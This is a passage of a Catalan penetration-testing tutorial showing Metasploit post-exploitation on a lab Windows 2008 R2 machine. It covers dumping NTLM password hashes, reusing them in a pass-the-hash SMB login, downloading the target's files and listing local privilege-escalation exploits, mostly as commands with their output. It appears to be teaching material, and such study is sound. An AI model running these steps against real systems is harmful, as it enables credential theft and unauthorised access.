## 4. Recollir informació:

Un cop arribats a aquest punt, ja podem extreure la informació del dispositiu atacat. Però com que la informació que es pot arribar a extreure d'un ordinador és molt àmplia, mostrarem alguns dels casos a tenir en compte:


### 4.1. Extracció de credencials mitjançant exploits

El que farem en aquest cas, és obrir una consola de meterpreter (igual que al punt anterior) a la màquina objectiu. Un cop la tenim oberta, podem utilitzar el mòdul "credential_collector" de meterpreter:

```
meterpreter > run post/windows/gather/credentials/credential_collector 

[*] Running module against VAGRANT-2008R2
[+] Collecting hashes...
    Extracted: Administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: sshd:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: sshd_server:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035
    Extracted: test:aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9
    Extracted: vagrant:aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9
[+] Collecting tokens...
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    VAGRANT-2008R2\sshd_server
    VAGRANT-2008R2\vagrant
    NT AUTHORITY\ANONYMOUS LOGON
```

Com podem veure, a la primera part de la sortida de la comanda, el mòdul ha extret diferents usuaris i contrasenyes. Els noms dels usuaris els podem llegir sense cap problema (Administrator, Guest, etc.), però les contrasenyes no, ja que el que hem obtingut és el seu hash. Encara que no les puguem llegir, les podem utilitzar per entrar mitjançant altres exploits. Farem la prova amb el mòdul smb_login (mòdul amb el qual es va fer l'atac de diccionari):

Primer de tot carreguem el mòdul "smb_login":

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > 
```

Després mirem les credencials obtingudes amb l'ordre "creds":

```
msf5 auxiliary(scanner/smb/smb_login) > creds
Credentials
===========

host          origin        service        public         private                                                            realm  private_type  JtR Format
----          ------        -------        ------         -------                                                            -----  ------------  ----------
192.168.0.21  192.168.0.21  445/tcp (smb)  vagrant        aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9  .      NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  vagrant        aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  administrator  aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  Administrator  aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  Guest          aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  sshd           aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  sshd_server    aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  test           aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  guest          aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
```

Un cop ja sabem amb quin usuari volem entrar, establim l'usuari i contrasenya:

```
msf5 auxiliary(scanner/smb/smb_login) > set smbuser administrator
smbuser => administrator
msf5 auxiliary(scanner/smb/smb_login) > set smbpass aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
smbpass => aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
```

Indiquem l'adreça ip a la qual ataquem:

```
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.0.21
srhosts => 192.168.0.21
```

I finalment executem l'exploit:

```
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.0.21:445      - 192.168.0.21:445 - Starting SMB login bruteforce
[+] 192.168.0.21:445      - 192.168.0.21:445 - Success: '.\administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b' Administrator
[*] 192.168.0.21:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Com podem veure, l'exploit ens ha retornat un estatus de "success" amb la combinació d'usuari i contrasenya que hem introduït.


### 4.2. Descarregar directoris o fitxers

Una altra manera d'obtenir informació de la màquina objectiu, és descarregant els directoris que té creats. Això ho podem fer amb el mateix client de meterpreter.

Primer de tot hem de tenir una consola de meterpreter oberta a la màquina objectiu. Un cop tenim això, podem utilitzar la comanda "download", acompanyada de la ruta del fitxer o directori per descarregar-lo:

```
meterpreter > download c:\\testing
[*] downloading: c:\testing\testfile.txt -> testing/testfile.txt
[*] download   : c:\testing\testfile.txt -> testing/testfile.txt
```

Els fitxers descarregats els podem trobar al home del nostre usuari:

```
root@kali:~# pwd
/root
root@kali:~# ls
testing
```

En el cas que no sapiguem quins fitxers hi ha a la màquina, o quina és la ruta completa, podem utilitzar les comandes "ls", "pwd", i "cd" al client de meterpreter com si fos un sistema linux, per navegar dins la màquina objectiu:

```
meterpreter > cd c:\\users
meterpreter > ls
Listing: c:\users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2020-04-29 11:35:47 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 01:06:44 -0400  All Users
40555/r-xr-xr-x   8192  dir   2009-07-13 23:20:08 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 01:06:44 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 23:20:08 -0400  Public
100666/rw-rw-rw-  174   fil   2009-07-14 00:57:55 -0400  desktop.ini
40777/rwxrwxrwx   8192  dir   2020-04-29 11:30:30 -0400  sshd_server
40777/rwxrwxrwx   8192  dir   2020-05-04 11:25:11 -0400  test
40777/rwxrwxrwx   8192  dir   2020-04-29 20:23:24 -0400  vagrant

meterpreter > pwd
c:\users
```

O la comanda "search" si no sabem on es troba exactament el fitxer però si sabem quin nom té:

```
meterpreter > search -f testfile.txt
Found 1 result...
    c:\testing\testfile.txt
```

### 4.3. Buscar més vulnerabilitats a nivell local


També podem aprofitar l'accés que tenim dins aquesta màquina per tal d'extreure informació sobre les vulnerabilitats que té a nivell local. Això ho farem amb el mòdul "local_exploit_suggester". Aquest mòdul escaneja el sistema per buscar vulnerabilitats que es puguin explotar amb metasploit, i després fa suggeriments sobre quins exploits es podrien utilitzar sobre aquesta màquina.

Primer de tot, hem de tenir una sessió oberta a la màquina objectiu en segon pla. Un cop la tinguem, carreguem el mòdul:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) >
```

Si mirem les opcions de configuració del mòdul, veurem que només ens demana el número de sessió, per tant li assignem la sessió de la màquina que volem atacar:

```
msf5 post(multi/recon/local_exploit_suggester) > set session 5
session => 5
```

Un cop configurat el mòdul, l'executem:

```
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.0.21 - Collecting local exploits for x64/windows...
[*] 192.168.0.21 - 13 exploit checks are being tried...
[+] 192.168.0.21 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
```
Com podem veure, el resultat de l'exploit ens indica quins altres mòduls podríem utilitzar en aquesta màquina a nivell local.

